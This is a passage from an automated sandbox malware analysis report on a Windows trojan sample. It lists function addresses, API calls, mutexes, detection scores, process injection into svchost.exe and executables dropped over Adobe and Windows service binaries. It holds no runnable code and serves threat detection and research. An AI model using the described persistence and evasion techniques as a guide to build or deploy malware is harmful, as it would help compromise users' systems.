          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_0040DF000_2_0040DF00
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00413FE00_2_00413FE0
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00B200D90_2_00B200D9
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00AE6EAF0_2_00AE6EAF
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00AE51EE0_2_00AE51EE
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00B1D5800_2_00B1D580
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00B137800_2_00B13780
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00B1C7F00_2_00B1C7F0
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00B239A30_2_00B239A3
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00B159800_2_00B15980
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00AE7B710_2_00AE7B71
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00AE7F800_2_00AE7F80
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00C310600_2_00C31060
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040E8553_2_0040E855
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004010C83_2_004010C8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004010D03_2_004010D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0042F1D33_2_0042F1D3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004029F83_2_004029F8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00402A003_2_00402A00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004032D03_2_004032D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0041040A3_2_0041040A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004104133_2_00410413
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004015003_2_00401500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00416DA33_2_00416DA3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040E6433_2_0040E643
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004106333_2_00410633
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004026F03_2_004026F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040E7883_2_0040E788
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040E7933_2_0040E793
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034FA3523_2_034FA352
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0344E3F03_2_0344E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_035003E63_2_035003E6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034E02743_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034C02C03_2_034C02C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034C81583_2_034C8158
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034301003_2_03430100
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034DA1183_2_034DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034F81CC3_2_034F81CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034F41A23_2_034F41A2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_035001AA3_2_035001AA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034D20003_2_034D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034647503_2_03464750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034407703_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0343C7C03_2_0343C7C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0345C6E03_2_0345C6E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034405353_2_03440535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_035005913_2_03500591
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034F24463_2_034F2446
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034E44203_2_034E4420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034EE4F63_2_034EE4F6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034FAB403_2_034FAB40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034F6BD73_2_034F6BD7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0343EA803_2_0343EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034569623_2_03456962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034429A03_2_034429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0350A9A63_2_0350A9A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0344A8403_2_0344A840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034428403_2_03442840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346E8F03_2_0346E8F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034268B83_2_034268B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B4F403_2_034B4F40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03482F283_2_03482F28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03460F303_2_03460F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034E2F303_2_034E2F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03432FC83_2_03432FC8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0344CFE03_2_0344CFE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034BEFA03_2_034BEFA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03440E593_2_03440E59
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034FEE263_2_034FEE26
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034FEEDB3_2_034FEEDB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03452E903_2_03452E90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034FCE933_2_034FCE93
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0344AD003_2_0344AD00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034DCD1F3_2_034DCD1F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0343ADE03_2_0343ADE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03458DBF3_2_03458DBF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03440C003_2_03440C00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03430CF23_2_03430CF2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034E0CB53_2_034E0CB5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0342D34C3_2_0342D34C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034F132D3_2_034F132D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0348739A3_2_0348739A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0345B2C03_2_0345B2C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034E12ED3_2_034E12ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034452A03_2_034452A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0347516C3_2_0347516C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0342F1723_2_0342F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0350B16B3_2_0350B16B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0344B1B03_2_0344B1B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034EF0CC3_2_034EF0CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034470C03_2_034470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034F70E93_2_034F70E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034FF0E03_2_034FF0E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034FF7B03_2_034FF7B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034856303_2_03485630
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034F16CC3_2_034F16CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034F75713_2_034F7571
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_035095C33_2_035095C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034DD5B03_2_034DD5B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034314603_2_03431460
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034FF43F3_2_034FF43F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034FFB763_2_034FFB76
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B5BF03_2_034B5BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0347DBF93_2_0347DBF9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0345FB803_2_0345FB80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034FFA493_2_034FFA49
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034F7A463_2_034F7A46
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B3A6C3_2_034B3A6C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034EDAC63_2_034EDAC6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034DDAAC3_2_034DDAAC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03485AA03_2_03485AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034E1AA33_2_034E1AA3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034499503_2_03449950
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0345B9503_2_0345B950
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034D59103_2_034D5910
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034AD8003_2_034AD800
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034438E03_2_034438E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034FFF093_2_034FFF09
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03441F923_2_03441F92
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034FFFB13_2_034FFFB1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03449EB03_2_03449EB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03443D403_2_03443D40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034F1D5A3_2_034F1D5A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034F7D733_2_034F7D73
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0345FDC03_2_0345FDC0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B9C323_2_034B9C32
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034FFCF23_2_034FFCF2
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: String function: 00407DE1 appears 35 times
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: String function: 00428900 appears 41 times
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: String function: 00420AE3 appears 70 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 034BF290 appears 105 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 034AEA12 appears 86 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0342B970 appears 280 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03475130 appears 58 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03487E54 appears 111 times
          Source: UaOJAOMxcU.exe, 00000000.00000003.2054328632.0000000004363000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs UaOJAOMxcU.exe
          Source: UaOJAOMxcU.exe, 00000000.00000003.2053478809.0000000004ECD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs UaOJAOMxcU.exe
          Source: UaOJAOMxcU.exe, 00000000.00000003.2046585509.0000000003EE0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameALG.exej% vs UaOJAOMxcU.exe
          Source: UaOJAOMxcU.exe, 00000000.00000003.2041241627.0000000003EE0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamearmsvc.exeN vs UaOJAOMxcU.exe
          Source: UaOJAOMxcU.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: UaOJAOMxcU.exeStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: armsvc.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: alg.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: AppVClient.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: UaOJAOMxcU.exeStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: armsvc.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: alg.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: AppVClient.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: classification engineClassification label: mal100.spre.troj.evad.winEXE@5/8@2/1
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_0046A06A GetLastError,FormatMessageW,0_2_0046A06A
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_004581CB AdjustTokenPrivileges,CloseHandle,0_2_004581CB
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_004587E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_004587E1
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_0046B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0046B333
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_0047EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0047EE0D
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_0046C397 CoInitialize,CoCreateInstance,CoUninitialize,0_2_0046C397
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00404E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00404E89
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00B0CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,0_2_00B0CBD0
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeFile created: C:\Users\user\AppData\Roaming\68325cf9c814f3fc.binJump to behavior
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-68325cf9c814f3fc-inf
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-68325cf9c814f3fc73779169-b
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeFile created: C:\Users\user\AppData\Local\Temp\aut8008.tmpJump to behavior
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: UaOJAOMxcU.exeVirustotal: Detection: 78%
          Source: UaOJAOMxcU.exeReversingLabs: Detection: 95%
          Source: unknownProcess created: C:\Users\user\Desktop\UaOJAOMxcU.exe "C:\Users\user\Desktop\UaOJAOMxcU.exe"
          Source: unknownProcess created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\UaOJAOMxcU.exe"
          Source: unknownProcess created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\UaOJAOMxcU.exe"Jump to behavior
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeSection loaded: wsock32.dllJump to behavior
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeSection loaded: webio.dllJump to behavior
          Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\alg.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\alg.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\alg.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: UaOJAOMxcU.exeStatic file information: File size 1777664 > 1048576
          Source: UaOJAOMxcU.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: UaOJAOMxcU.exe, 00000000.00000003.2041180877.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe.0.dr
          Source: Binary string: AppVClient.pdbGCTL source: AppVClient.exe.0.dr
          Source: Binary string: ALG.pdbGCTL source: UaOJAOMxcU.exe, 00000000.00000003.2046467413.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr
          Source: Binary string: AppVClient.pdb source: AppVClient.exe.0.dr
          Source: Binary string: wntdll.pdbUGP source: UaOJAOMxcU.exe, 00000000.00000003.2052793955.0000000004240000.00000004.00001000.00020000.00000000.sdmp, UaOJAOMxcU.exe, 00000000.00000003.2050079524.0000000004230000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2367722513.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2366014317.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2399968118.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2399968118.000000000359E000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: UaOJAOMxcU.exe, 00000000.00000003.2052793955.0000000004240000.00000004.00001000.00020000.00000000.sdmp, UaOJAOMxcU.exe, 00000000.00000003.2050079524.0000000004230000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000003.00000003.2367722513.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2366014317.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2399968118.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2399968118.000000000359E000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: ALG.pdb source: UaOJAOMxcU.exe, 00000000.00000003.2046467413.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr
          Source: alg.exe.0.drStatic PE information: 0xF67E8745 [Tue Jan 18 10:28:21 2101 UTC]
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00404B37 LoadLibraryA,GetProcAddress,0_2_00404B37
          Source: AppVClient.exe.0.drStatic PE information: real checksum: 0xcd10f should be: 0x14e6ee
          Source: armsvc.exe.0.drStatic PE information: section name: .didat
          Source: alg.exe.0.drStatic PE information: section name: .didat
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00428945 push ecx; ret 0_2_00428958
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00402F12 push es; retf 0_2_00402F13
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00AEB180 push 00AEB0CAh; ret 0_2_00AEB061
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00AEB180 push 00AEB30Dh; ret 0_2_00AEB1E6
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00AEB180 push 00AEB2F2h; ret 0_2_00AEB262
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00AEB180 push 00AEB255h; ret 0_2_00AEB2ED
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00AEB180 push 00AEB2D0h; ret 0_2_00AEB346
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00AEB180 push 00AEB37Fh; ret 0_2_00AEB3B7
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00AE520C push 00AE528Fh; ret 0_2_00AE522D
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00B08550 push 00B0852Eh; ret 0_2_00B07F3A
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00B08550 push 00B08514h; ret 0_2_00B07F66
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00B08550 push 00B07E66h; ret 0_2_00B08057
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00B08550 push 00B0817Ah; ret 0_2_00B0808B
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00B08550 push 00B082E5h; ret 0_2_00B080D9
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00B08550 push 00B0826Ah; ret 0_2_00B0819E
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00B08550 push 00B0849Ch; ret 0_2_00B081E4
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00B08550 push 00B0805Ch; ret 0_2_00B08255
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00B08550 push 00B08321h; ret 0_2_00B082E0
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00B08550 push 00B07FBFh; ret 0_2_00B0831F
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00B08550 push 00B07FA8h; ret 0_2_00B0834C
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00B08550 push 00B084BAh; ret 0_2_00B083E2
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00B08550 push 00B08426h; ret 0_2_00B084D8
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00B08550 push 00B08075h; ret 0_2_00B084FD
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00B08550 push 00B0808Ch; ret 0_2_00B08512
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00B08550 push 00B08B6Fh; ret 0_2_00B08596
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00B08550 push 00B08E94h; ret 0_2_00B085C9
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00B08550 push 00B0878Bh; ret 0_2_00B08734
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00B08550 push 00B08D45h; ret 0_2_00B087D3
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00B08550 push 00B08E5Fh; ret 0_2_00B0885F
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00B08550 push 00B08AB5h; ret 0_2_00B08B13
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00B08550 push 00B08784h; ret 0_2_00B08CA1
          Source: UaOJAOMxcU.exeStatic PE information: section name: .reloc entropy: 7.938045915639303
          Source: AppVClient.exe.0.drStatic PE information: section name: .reloc entropy: 7.94302526305403

          Persistence and Installation Behavior

          barindex
          Drops executable to a common third party application directory
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
